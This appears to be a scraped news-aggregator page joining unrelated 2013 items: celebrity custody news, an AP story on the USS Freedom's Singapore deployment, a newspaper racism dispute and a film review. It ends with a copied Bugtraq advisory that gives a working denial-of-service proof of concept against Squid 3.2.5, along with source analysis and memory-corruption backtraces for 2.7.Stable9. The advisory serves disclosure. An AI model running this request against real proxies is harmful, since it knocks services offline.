And Deion has been given the right to make all decisions in regards to where their children live, their health, their education and their well being.

Pilar says that the judge would not allow testimony in regards to that April 2012 domestic dispute that ended with Pilar having visible bruises, and Deion claiming that she hurt HIM.

Deion told the Dallas Morning News while leaving the McKinney courthouse yesterday, ?I?m thankful; I?m elated.? In any war, there will be casualties, but I didn?t want the casualties in this case to be my kids.?

Pilar told media, ?If that?s not one-sided, you have to be blind, dumb, crazy and stupid.? Unfortunately, my children will suffer, but I raised them well enough to understand what?s what.?

The custody issue has been settled, but Pilar says she will appeal.? They are also still in court about division of the martial assets.

Oh, where have we seen this situation before....

Photos via Pacific Coast News

Source: http://theybf.com/2013/03/13/legal-wars-ne-yos-ex-girlfriend-sues-him-for-defamation-deion-sanders-wins-primary

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Tuesday, March 12, 2013

Ronda Rousey and Mike Tyson interviewed together, drop tons of wisdom (Video)

My Fox LA invited former heavyweight boxing champion Mike Tyson onset with UFC women's bantamweight champion Ronda Rousey, and it was basically like having Confucius on-set. Both fighters dropped wisdom bombs throughout their interview. A few samples:

  • Stick with your moms and a good lawyer. That's all you need. Your mother and a good lawyer. -- Tyson
  • If it's a pain situation, that's something you can ignore. -- Rousey
  • Spirit makes you a better fighter, not drugs. -- Tyson
  • I always try to win in a way they the opponent never wants to fight me again. -- Rousey

It's a whole lot of knowledge packed into a 6-minute interview. Check it out.

Thanks, With Leather.

More news from the Yahoo Sports Minute:

Other popular content on Yahoo! Sports:
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? Watch DeAndre Jordan obliterate Brandon Knight with ferocious dunk
? Infographic: Memorable moments of Big East tournament
? Oakland A's Michael Taylor sidelined with odd bubble-gum injury

Source: http://sports.yahoo.com/blogs/mma-cagewriter/ronda-rousey-mike-tyson-interviewed-together-drop-tons-160000043--mma.html

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Navy sends new ship to Singapore amid budget cuts

Navy Chief Petty Officer Eleuterio Roman, left, and Lt. Steve Hartley, monitor screens on board the USS Freedom as it nears Pearl Harbor, Hawaii, Monday, March 11, 2013. The USS Freedom, which is stopping in Hawaii on its way to a deployment to Singapore, has advantages its bigger siblings lack. It is small enough to move among the many islands and shallow waters lining the extensive coastlines of Southeast Asia. (AP Photo/Audrey McAvoy)

Navy Chief Petty Officer Eleuterio Roman, left, and Lt. Steve Hartley, monitor screens on board the USS Freedom as it nears Pearl Harbor, Hawaii, Monday, March 11, 2013. The USS Freedom, which is stopping in Hawaii on its way to a deployment to Singapore, has advantages its bigger siblings lack. It is small enough to move among the many islands and shallow waters lining the extensive coastlines of Southeast Asia. (AP Photo/Audrey McAvoy)

In this photo provided by the U.S. Navy, the USS Freedom littoral combat ship pulls into Pearl Harbor, Hawaii. The USS Freedom, which is stopping in Hawaii on its way to a deployment to Singapore, has advantages bigger U.S. Navy ships lack. (AP Photo/US Navy, Mass Communication Specialist 2nd Class Sean Furey)

In this photo provided by the U.S. Navy, the USS Freedom littoral combat ship pulls into Pearl Harbor, Hawaii. The USS Freedom, which is stopping in Hawaii on its way to a deployment to Singapore, has advantages bigger U.S. Navy ships lack. (AP Photo/US Navy, Mass Communication Specialist 2nd Class Sean Furey)

(AP) ? The U.S. Navy's hottest new ship and the centerpiece of its renewed focus on Asia isn't its largest vessel, or its most technologically advanced. But it has advantages that its bigger siblings lack.

The 388-foot USS Freedom is small enough to move among the many islands and shallow waters of Southeast Asia, a trait that allows the Navy to train alongside similar-sized vessels in the region's navies and build relationships with them.

All this, the Navy believes, will help it make sure the region's critical waterways stay open to the trillions of dollars in oil and other trade that passes through each year. It's an objective so important the Navy is sending the Freedom to Singapore this month even as automatic federal spending cuts carve into its budget.

"We hold our commitment to them, to our area, our theater, so highly that this deployment has not been affected," said Rear Adm. Hugh Wetherald, the U.S. Pacific Fleet deputy chief of staff for plans, policies and requirements.

"The Navy and the Pacific Fleet are still on watch," he said.

Freedom on Monday sailed to Pearl Harbor, into the prime mooring spot the Navy often reserves for ships it wants to show off. The blue and gray camouflage painted on its sides ? designed to confuse hostile small boats and make it less visible from shore ? stood out amid the plain gray hulls of the other surface vessels in port.

Until now, most U.S. ships visiting Southeast Asia have been aircraft carriers, destroyers, cruisers and other large boats well equipped for jobs like firing cruise missiles or defending against fighter jets.

But they dwarf smaller ships U.S. partner navies from other countries ? such as Singapore, Malaysia, Brunei and Thailand ? use for missions like patrolling the seas, catching pirates and stopping human and drug trafficking.

The larger vessels are also too big to pull into shallower ports, forcing them to sometimes anchor offshore while in the region.

The Freedom is equipped with guns and a helicopter and is designed to defend against small boats and other threats. The Navy will later have the option of swapping out its surface warfare equipment with so-called modules for hunting submarines and finding and disabling mines.

When he commanded ships moving through the region, Wetherald remembered, his counterparts from other countries would tell him that they'd like to work with smaller U.S. vessels.

"Their flag officers would say, 'Hey, I'm glad you're here, I love your big ship, but can you send us smaller ships? Can we exercise with smaller ships because your ship is very big,'" he recalled.

The littoral combat ship weighs less than half as much as a typical U.S. destroyer and carries a crew of fewer than 100 sailors. It measures about the length of one football field ? a scale that will allow the U.S. to join countries as a partner.

"It's a whole different world," Wetherald said.

The Navy plans to keep the Freedom in the region for eight months, though its San Diego-based crew will rotate out after four. Another crew will serve the rest of the deployment and take the ship back home to California.

Wetherald said the Freedom will spend its deployment practicing basic naval skills in bilateral exercises with partner nations. Some drills will involve practicing responses to disasters and providing humanitarian assistance.

In a few years, the Navy aims to have the ships participate in multilateral exercises.

The U.S. is building two dozen littoral combat ships in all. It eventually plans to use some of them to replace minesweepers operating out of Bahrain and Japan.

Singapore has agreed to allow the Freedom and its crew to refuel, restock on food and get other supplies while it's deployed. In a couple of years, the Navy plans to send another so it will have two littoral combat ships in the region at a time. It ultimately hopes to have as many as four in the area.

The U.S. says it's emphasizing Asia and the Pacific because it's such an important part of the global economy. Though U.S. officials don't like to advertise the point, Washington is also responding to China's growth as a military power.

China is on the minds of countries in the region as well.

Tim Huxley, Asia executive director for the International Institute for Security Studies, said accommodating the deployments is a way for Singapore to encourage the U.S. to stay involved in Southeast Asia as a counterweight to China.

This adheres to the small city-state's long-held strategy of ensuring its own security by keeping major powers involved in the neighborhood and balancing them off each other, Huxley said.

Huxley said the deployment comes at a time when regional security is "becoming more complex and potentially more dangerous."

There are active territorial disputes in the South China Sea, where six governments ? China, Brunei, Malaysia, the Philippines, Vietnam and Taiwan ? have overlapping claims. Insurgencies are brewing in the southern Philippines and southern Thailand. And the regional power balance, especially between the U.S. and China, is "in a state of flux," he said.

He suspects the arrival of the littoral combat ship will add stability instead of complicating the situation further.

"It sends a tangible signal that the U.S. is determined to remain deeply involved in regional security. And at a time of change, I think that's a useful message to send," Huxley said by telephone from in Singapore.

Associated Press

Source: http://hosted2.ap.org/APDEFAULT/386c25518f464186bf7a2ac026580ce7/Article_2013-03-12-Freedom%20Deploys/id-0b595f3fa5d745de96ec339fda33656b

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Sunday, March 10, 2013

Marriage Proposal Wipeout: Wave Pummels Couple, Can't Ruin Magic Moment

Source: http://www.thehollywoodgossip.com/2013/03/marriage-proposal-wipeout-wave-pummels-couple-cant-ruin-magic-mo/

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Vermont Paper Defends 'Fry Rice' Sign Supporting Team

MONTPELIER, Vt. (AP) ? A Vermont newspaper defended itself Saturday against accusations of racism over a poster it published in support of a local sports team that read "fry Rice" in type associated with Chinese calligraphy, saying it meant no offense and simply wanted to play on words.

The back-page poster, printed in Thursday's editions, was intended to support St. Johnsbury Academy's basketball team in its game against Rice Memorial High School in South Burlington, the Caledonian Record wrote in an unsigned editorial (http://bit.ly/Yj75aB ).

"We sought a simple play on words in support of an extraordinary group of local student athletes. Indulging our critics for a moment, the outcry reminds us that racial and ethnic stereotypes can offend ? regardless of intent," the editorial said.

The editorial acknowledged that the poster's wordplay, punctuated by the chosen font, "evoked a particular ethnic cuisine" but did not constitute racism.

"We don't concede, however, that the use of imagery with any racial, ethnic or religious inference is to inherently debase that race/ethnicity/religion," the paper said.

"A fair accusation of racism would at least pre-require the reference to actually be demeaning or degrading," the editorial said. "Simply invoking ethnic customs (food, dress, design) doesn't do that, nor does it suggest any kind of characteristic about the culture, its people or a history of oppression by the majority.

But the editorial missed the point, said the president of the Asian American Journalists Association, who had criticized the poster after it was published.

"I'm not criticizing the Caledonian Record for rooting for their home team," said Paul Cheung, the association's president. While Cheung does not believe the newspaper's intention was to be racist, it showed "a lapse of judgment and poor taste."

"It evoked a racial undertone and a negative stereotype," said Cheung, who is also interactive and graphics editor for The Associated Press.

St. Johnsbury Academy ended up losing the game to Rice Memorial.

A private school, St. Johnsbury Academy serves local students and also has boarding students from across the world, including Asia. Academy Headmaster Tom Lovett said Friday that none of the school's Asian students were offended by the poster.

"Overall, our students often see such things as a way to celebrate their culture, not demean it. And in this case, we chose to follow our students' lead and look at the Caledonian's intent, not taking offense where none was intended," Lovett said.

Also on HuffPost:

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Source: http://www.huffingtonpost.com/2013/03/09/vt-paper-fry-rice-sign-caledonian-record_n_2843391.html

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Saturday, March 9, 2013

Review: Dead Man Down

Dead Man Down Rating 3 (out of five)

Starring: Colin Farrell, Noomi Rapace, Dominic Cooper, Terrence Howard

Directed by: Niels Arden Oplev

Running time: 110 minutes

Parental guidance: Violence, coarse language

Playing at: Banque Scotia, Colossus, Kirkland, Lacordaire, March? Central, Sph?retech,

Taschereau cinemas

There's a distinctly European feel to Dead Man Down, a thriller directed by Danish filmmaker Niels Arden Oplev, starring Irish-born Colin Farrell and Swedish-Spanish ing?nue Noomi Rapace, and set in a New York City that feels cut off from its natural native texture of street life, glamour and comical cabbies.

It's a story about two lost people seeking revenge in different, violent ways and struggling through the gloom of life's disappointments. If you didn't know better, you'd swear the whole thing was translated from the Swedish; in fact, some of the dialogue is in French with English subtitles.

The movie reunites Oplev and Rapace from the original film version of The Girl With The Dragon Tattoo, and they bring with it some of the same Nordic chill, and some of the same sense of hopeless fate.

Rapace plays Beatrice, a pretty beautician who's not so pretty any more since a car accident scarred the left side of her face. The neighbourhood kids call her "monster." Rebecca lives with her mother (French star Isabelle Huppert).

Beatrice et m?re live in an apartment with a view of their neighbour, Victor (Farrell), a taciturn tough guy who works for a mobster named Alphonse Hoyt (Terrence Howard.) Hoyt is involved in the drug trade, although the film's at-tempts at evoking the hip-hop culture of guns, cocaine and danger look like something copied from TV.

Someone is knocking off Alphonse's gang members and leaving cryptic notes ("719. Now you realize") and little squares from a photograph that Alphonse is slowly assembling like a jigsaw puzzle.

A mystery man is out to get him, and when Beatrice notices that her cute, across-the-courtyard neighbour recently strangled someone to death, we get a good idea who. Having a murderous neighbour, which was such a burden in Rear Window, is a blessing to Beatrice, who is looking for someone who can do a little assassination job: to knock off the drunk driver who caused the car accident that disfigured her.

This throws Beatrice and Victor into an unhappy partnership, although one with enough affection that she gives him her lucky rabbit's foot ("it's chartreuse," she instructs him.)

He's on a mission of vengeance himself, something to do with his late wife and daughter and a background as a Hungarian engineer with military training. Imagine if Keyser Soze had emigrated from The Usual Suspects into something by the Hughes Brothers during their Stockholm period.

Farrell and Rapace are well suited, two quiet performers who hint at hidden depths. As they go on their separate although connected missions, the person on their trail is a more expressive choice: Darcy (Dominic Cooper), another one of Alphonse's gang who fancies himself a bit of a detective. Good thing, too, because there's no police presence in Dead Man Down.

The screenplay by W.H. Wyman is as elusive as everything else, filling in the story as it goes and counting on us to keep up. At one stage, Rebecca delivers her mother's cookies to Victor, opens the refrigerator door and says: "I will wedge it in there between the mustard and these plastic explosives." That's the foreshadowing for a final reel that throws off its cool European angst and embraces the unlikely pyrotechnics of Hollywood: gun battles, mass killings, everything blowing up real fine.

It doesn't seem very European, but as Jean-Luc Godard once said, all you need for a movie is a gun and a girl. A chartreuse rabbit's foot is optional.

Source: http://www.montrealgazette.com/entertainment/movie-guide/Movie+review+Dead+Down+Very+Swedish+until/8066439/story.html

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Friday, March 8, 2013

Squid 3.2.5 httpMakeVaryMark() header value DoS, 2.7.Stable9 memory corruption.

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Squid 3.2.5 httpMakeVaryMark() header value DoS, 2.7.Stable9 memory corruption.
From: tytusromekiatomek () hushmail com
Date: Tue, 05 Mar 2013 20:59:43 +0000

############################################################## # httpMakeVaryMark() header value 'value' (http.cc:603 line) # ############################################################## # # Authors: # # 22733db72ab3ed94b5f8a1ffcde850251fe6f466 # c8e74ebd8392fda4788179f9a02bb49337638e7b # AKAT-1 # #######################################  # Versions: 3.2.5    It takes combination of a 5x requests and responses in less than 10 seconds to crash the parent:   Request   -- cut --   #!/usr/bin/env python   print 'GET /index.html HTTP/1.1'   print 'Host: localhost'   print 'X-HEADSHOT: ' + '%XX' * 19000   print '\r\n\r\n'   -- cut --    Response   -- cut --   HTTP/1.1 200 OK   Vary: X-HEADSHOT   -- cut --    Code:    In function httpMakeVaryMark() header value 'value' (http.cc:603 line) of the request is   passed to rfc1738_escape_part() (rfc1738.c: 145 line) function, which escapes in POC example   percent signs. This mean that the single charachter in request is now triple in length   (e.g. '%' is now '%25'), thus 'X-HEADSHOT' header leangth from POC is now 57000 + (19000*2).    This causes the 'value' length to be greater than 65536 (String.cc: 198 line) and the assert   is invoked, which kills the child. When child is killed the Kid::stop() is called, which   increments the 'badFailures' counter (Kid.cc:57 line). If the counter is greater than 4,   then hopeless() function is called (src/ipc/Kid.cc:75 line), which terminates the main   process of squid (parent) with the following message:   "Squid Parent: (squid-1) process 8308 will not be restarted due to repeated, frequent failures"    src/http.cc:   573 httpMakeVaryMark(HttpRequest * request, HttpReply const * reply)   574 {   575     String vary, hdr;   576     const char *pos = NULL;   577     const char *item;   578     const char *value;   579     int ilen;   580     static String vstr;   581   582     vstr.clean();   583     vary = reply->header.getList(HDR_VARY);   584   585     while (strListGetItem(&vary, ',', &item, &ilen, &pos)) {   586         char *name = (char *)xmalloc(ilen + 1);   587         xstrncpy(name, item, ilen + 1);   588         Tolower(name);   589   590         if (strcmp(name, "*") == 0) {   591             /* Can not handle "Vary: *" withtout ETag support */   592             safe_free(name);   593             vstr.clean();   594             break;   595         }   596   597         strListAdd(&vstr, name, ',');   598         hdr = request->header.getByName(name);   599         safe_free(name);   600         value = hdr.termedBuf();   601   602         if (value) {   603             value = rfc1738_escape_part(value);   604             vstr.append("=\"", 2);   605             vstr.append(value);   606             vstr.append("\"", 1);   607         }    lib/rfc1738.c:   143         /* Do the triplet encoding, or just copy the char */   144         if (do_escape == 1) {   145             (void) snprintf(dst, (bufsize-(dst-buf)), "%%%02X", (unsigned char) *src);   146             dst += sizeof(char) * 2;   147         } else {   148             *dst = *src;   149         }    src/String.cc:   186 String::append( char const *str, int len)   187 {   188     assert(this);   189     assert(str && len >= 0);   190   191     PROF_start(StringAppend);   192     if (len_ + len < size_) {   193         strncat(buf_, str, len);   194         len_ += len;   195     } else {   196         // Create a temporary string and absorb it later.   197         String snew;   198         assert(len_ + len < 65536); // otherwise snew.len_ overflows below   199         snew.len_ = len_ + len;   200         snew.allocBuffer(snew.len_ + 1);   201   202         if (len_)   203             memcpy(snew.buf_, rawBuf(), len_);   204   205         if (len)   206             memcpy(snew.buf_ + len_, str, len);   207   208         snew.buf_[snew.len_] = '\0';   209   210         absorb(snew);   211     }   212     PROF_stop(StringAppend);   213 }    src/ipc/Kid.cc:   46 /// called when kid terminates, sets exiting status   47 void Kid::stop(status_type exitStatus)   48 {   49     assert(running());   50     assert(startTime != 0);   51   52     isRunning = false;   53   54     time_t stop_time;   55     time(&stop_time);   56     if ((stop_time - startTime) < fastFailureTimeLimit)   57         ++badFailures;   58     else   59         badFailures = 0; // the failures are not "frequent" [any more]   60   61     status = exitStatus;   62 }   70 /// returns true if master process should restart this kid   71 bool Kid::shouldRestart() const   72 {   73     return !(running() ||   74              exitedHappy() ||   75              hopeless() ||   76              shutting_down ||   77              signaled(SIGKILL) || // squid -k kill   78              signaled(SIGINT) || // unexpected forced shutdown   79              signaled(SIGTERM)); // unexpected forced shutdown   80 }    src/ipc/Kid.h:   23     /// keep restarting until the number of bad failures exceed this limit   24     enum { badFailureLimit = 4 };   25   26     /// slower start failures are not "frequent enough" to be counted as "bad"   27     enum { fastFailureTimeLimit = 10 }; // seconds    # BONUS POINT ;-)  # Well, we think that in squid 2.7.Stable9 this is not cought in assert... *cough*     #3  0x00007f9fd8cead76 in malloc_printerr (action=3, str=0x7f9fd8dbfc14 "malloc(): memory corruption", ptr=<optimized  out>) at malloc.c:6283   #16 0x00000000004874df in httpMakeVaryMark (request=0x42cf1410, reply=0x37d7c10) at http.c:397 and    #3  0x00007ff741a56d76 in malloc_printerr (action=3, str=0x7ff741b2f228 "double free or corruption (out)",  ptr=<optimized out>) at malloc.c:6283   #9  0x00000000004874df in httpMakeVaryMark (request=0x1f2dd20, reply=0x2bf6a90) at http.c:397 and    #3  0x00007f090d3add76 in malloc_printerr (action=3, str=0x7f090d486270 "free(): corrupted unsorted chunks",  ptr=<optimized out>) at malloc.c:6283   #9  0x00000000004874df in httpMakeVaryMark (request=0x371daf50, reply=0x373883a0) at http.c:397 and    #3  0x00007f609df68d76 in malloc_printerr (action=3, str=0x7f609e0411b8 "free(): invalid next size (normal)",  ptr=<optimized out>) at malloc.c:6283   #9  0x0000000000487507 in httpMakeVaryMark (request=0x8c2d1df0, reply=0x8850c050) at http.c:398 EOF  

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  • Squid 3.2.5 httpMakeVaryMark() header value DoS, 2.7.Stable9 memory corruption. tytusromekiatomek (Mar 06)

Source: http://seclists.org/bugtraq/2013/Mar/27

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